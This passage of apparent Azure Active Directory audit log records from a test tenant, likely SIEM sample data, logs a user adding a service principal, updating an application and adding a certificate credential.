"1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR568"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add service principal.", "Id": "48403af8-b712-4e63-a999-686b631240ac"} +{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-11T16:36:31", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 
2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Type": 2, "ID": "fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "siem2"}, {"Type": 2, "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}, {"Type": 4, "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}], "ObjectId": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40", "ModifiedProperties": [{"NewValue": "[\r\n true\r\n]", "OldValue": "[]", "Name": "AccountEnabled"}, {"Name": "AppPrincipalId", "OldValue": "[]", "NewValue": "[\r\n \"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"\r\n]"}, {"Name": "DisplayName", "OldValue": "[]", "NewValue": "[\r\n \"siem2\"\r\n]"}, {"Name": "ServicePrincipalName", "OldValue": "[]", "NewValue": "[\r\n \"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"\r\n]"}, {"Name": "Credential", "OldValue": "[]", "NewValue": "[\r\n {\r\n \"CredentialType\": 2,\r\n \"KeyStoreId\": \"291154f0-a9f5-45bb-87be-9c8ee5b6d62c\",\r\n \"KeyGroupId\": \"291154f0-a9f5-45bb-87be-9c8ee5b6d62c\"\r\n }\r\n]"}, {"Name": "Included Updated Properties", "OldValue": "", "NewValue": "AccountEnabled, AppPrincipalId, DisplayName, ServicePrincipalName, Credential"}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": 
""}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}, {"Name": "targetName", "Value": "siem2"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"AccountEnabled\",\"AppPrincipalId\",\"DisplayName\",\"ServicePrincipalName\",\"Credential\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "381d015d-6660-4dce-af99-4cd8c3b61d4d"}, {"Name": "version", "Value": "2"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-11T16:36:31.1327910Z"}, {"Name": "env_epoch", "Value": "NNJOH"}, {"Name": "env_seqNum", "Value": "39121960"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##d409567a-16bf-49cb-a4c9-cb4608f62168_00000000-0000-0000-0000-000000000000_d409567a-16bf-49cb-a4c9-cb4608f62168"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": 
"MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR568"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add service principal.", "Id": "48403af8-b712-4e63-a999-686b631240ac"} +{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-11T16:36:31", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Type": 2, "ID": "fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "siem2"}, {"Type": 2, "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}, {"Type": 4, "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}], "ObjectId": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40", "ModifiedProperties": [{"NewValue": "[\r\n true\r\n]", "OldValue": "[]", "Name": "AccountEnabled"}, {"Name": "AppPrincipalId", "OldValue": "[]", "NewValue": "[\r\n \"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"\r\n]"}, {"NewValue": "[\r\n \"siem2\"\r\n]", "OldValue": "[]", "Name": "DisplayName"}, {"NewValue": "[\r\n \"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"\r\n]", "OldValue": "[]", "Name": 
"ServicePrincipalName"}, {"Name": "Credential", "OldValue": "[]", "NewValue": "[\r\n {\r\n \"CredentialType\": 2,\r\n \"KeyStoreId\": \"291154f0-a9f5-45bb-87be-9c8ee5b6d62c\",\r\n \"KeyGroupId\": \"291154f0-a9f5-45bb-87be-9c8ee5b6d62c\"\r\n }\r\n]"}, {"Name": "Included Updated Properties", "OldValue": "", "NewValue": "AccountEnabled, AppPrincipalId, DisplayName, ServicePrincipalName, Credential"}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}, {"Name": "targetName", "Value": "siem2"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"AccountEnabled\",\"AppPrincipalId\",\"DisplayName\",\"ServicePrincipalName\",\"Credential\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "381d015d-6660-4dce-af99-4cd8c3b61d4d"}, {"Name": "version", "Value": "2"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": 
"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-11T16:36:31.1327910Z"}, {"Name": "env_epoch", "Value": "NNJOH"}, {"Name": "env_seqNum", "Value": "39121960"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##d409567a-16bf-49cb-a4c9-cb4608f62168_00000000-0000-0000-0000-000000000000_d409567a-16bf-49cb-a4c9-cb4608f62168"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR568"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add service principal.", "Id": "48403af8-b712-4e63-a999-686b631240ac"} +{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-11T16:42:45", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": 
"Application_33cdc459-1335-4d6c-b773-f5eef4df7793"}, {"Type": 2, "ID": "33cdc459-1335-4d6c-b773-f5eef4df7793"}, {"Type": 2, "ID": "Application"}, {"Type": 1, "ID": "siem2"}], "ObjectId": "Not Available", "ModifiedProperties": [], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "33cdc459-1335-4d6c-b773-f5eef4df7793"}, {"Name": "extendedAuditEventCategory", "Value": "Application"}, {"Name": "targetName", "Value": "siem2"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[]"}, {"Name": "correlationId", "Value": "531446ed-abd2-468f-96a8-a4dcc7b05168"}, {"Name": "version", "Value": "2"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-11T16:42:45.0442303Z"}, {"Name": "env_epoch", "Value": "VYXPT"}, {"Name": "env_seqNum", "Value": "45826392"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##51f1503a-20a3-43cd-b898-bea330e149be_00000000-0000-0000-0000-000000000000_51f1503a-20a3-43cd-b898-bea330e149be"}, {"Name": "env_os", "Value": ""}, {"Name": 
"env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR559"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Update application.", "Id": "aaa361ac-50e8-43f4-9aaf-c19c09e3e3bc"} +{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-11T16:42:45", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "Application_33cdc459-1335-4d6c-b773-f5eef4df7793"}, {"Type": 2, "ID": "33cdc459-1335-4d6c-b773-f5eef4df7793"}, {"Type": 2, "ID": "Application"}, {"Type": 1, "ID": "siem2"}], "ObjectId": "Not Available", "ModifiedProperties": [{"Name": "KeyDescription", "OldValue": "[]", "NewValue": "[\r\n \"[KeyIdentifier=6d944a5f-234c-4879-8de4-39f089d8b96b,KeyType=AsymmetricX509Cert,KeyUsage=Verify,DisplayName=E=asr@example.net, CN=testsiem.onmicrosoft.com, OU=SIEM, O=Elastic, L=Barcelona, S=Barce]\"\r\n]"}, {"Name": "Included Updated Properties", "OldValue": "", 
"NewValue": "KeyDescription"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "33cdc459-1335-4d6c-b773-f5eef4df7793"}, {"Name": "extendedAuditEventCategory", "Value": "Application"}, {"Name": "targetName", "Value": "siem2"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"KeyDescription\"]"}, {"Name": "correlationId", "Value": "531446ed-abd2-468f-96a8-a4dcc7b05168"}, {"Name": "version", "Value": "2"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-11T16:42:45.0442303Z"}, {"Name": "env_epoch", "Value": "VYXPT"}, {"Name": "env_seqNum", "Value": "45826385"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##51f1503a-20a3-43cd-b898-bea330e149be_00000000-0000-0000-0000-000000000000_51f1503a-20a3-43cd-b898-bea330e149be"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, 
{"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR559"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Update application \u2013 Certificates and secrets management ", "Id": "20a82fa1-625b-491a-a3e8-54d779a9b17e"} +{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-11T16:42:45", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "Application_33cdc459-1335-4d6c-b773-f5eef4df7793"}, {"Type": 2, "ID": "33cdc459-1335-4d6c-b773-f5eef4df7793"}, {"Type": 2, "ID": "Application"}, {"Type": 1, "ID": "siem2"}], "ObjectId": "Not Available", "ModifiedProperties": [{"NewValue": "[\r\n \"[KeyIdentifier=6d944a5f-234c-4879-8de4-39f089d8b96b,KeyType=AsymmetricX509Cert,KeyUsage=Verify,DisplayName=E=asr@example.net, CN=testsiem.onmicrosoft.com, OU=SIEM, O=Elastic, L=Barcelona, S=Barce]\"\r\n]", "OldValue": "[]", "Name": "KeyDescription"}, {"Name": "Included Updated Properties", "OldValue": "", "NewValue": "KeyDescription"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "actorContextId", "Value": 
"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "33cdc459-1335-4d6c-b773-f5eef4df7793"}, {"Name": "extendedAuditEventCategory", "Value": "Application"}, {"Name": "targetName", "Value": "siem2"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"KeyDescription\"]"}, {"Name": "correlationId", "Value": "531446ed-abd2-468f-96a8-a4dcc7b05168"}, {"Name": "version", "Value": "2"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-11T16:42:45.0442303Z"}, {"Name": "env_epoch", "Value": "VYXPT"}, {"Name": "env_seqNum", "Value": "45826385"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##51f1503a-20a3-43cd-b898-bea330e149be_00000000-0000-0000-0000-000000000000_51f1503a-20a3-43cd-b898-bea330e149be"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": 
"env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR559"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Update application \u2013 Certificates and secrets management ", "Id": "20a82fa1-625b-491a-a3e8-54d779a9b17e"} +{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-11T16:42:45", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Type": 2, "ID": "fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "siem2"}, {"Type": 2, "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}, {"Type": 4, "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}], "ObjectId": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40", "ModifiedProperties": [{"Name": "Included Updated Properties", "OldValue": "", "NewValue": ""}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": "actorContextId", "Value": 
"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}, {"Name": "targetName", "Value": "siem2"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "531446ed-abd2-468f-96a8-a4dcc7b05168"}, {"Name": "version", "Value": "2"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-11T16:42:45.1042022Z"}, {"Name": "env_epoch", "Value": "VYXPT"}, {"Name": "env_seqNum", "Value": "45826464"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##51f1503a-20a3-43cd-b898-bea330e149be_00000000-0000-0000-0000-000000000000_51f1503a-20a3-43cd-b898-bea330e149be"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": 
"env_cloud_roleInstance", "Value": "AM5RRDSR559"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Update service principal.", "Id": "15adbe69-7974-41ec-8341-208456600ad3"} +{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-11T16:42:45", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": 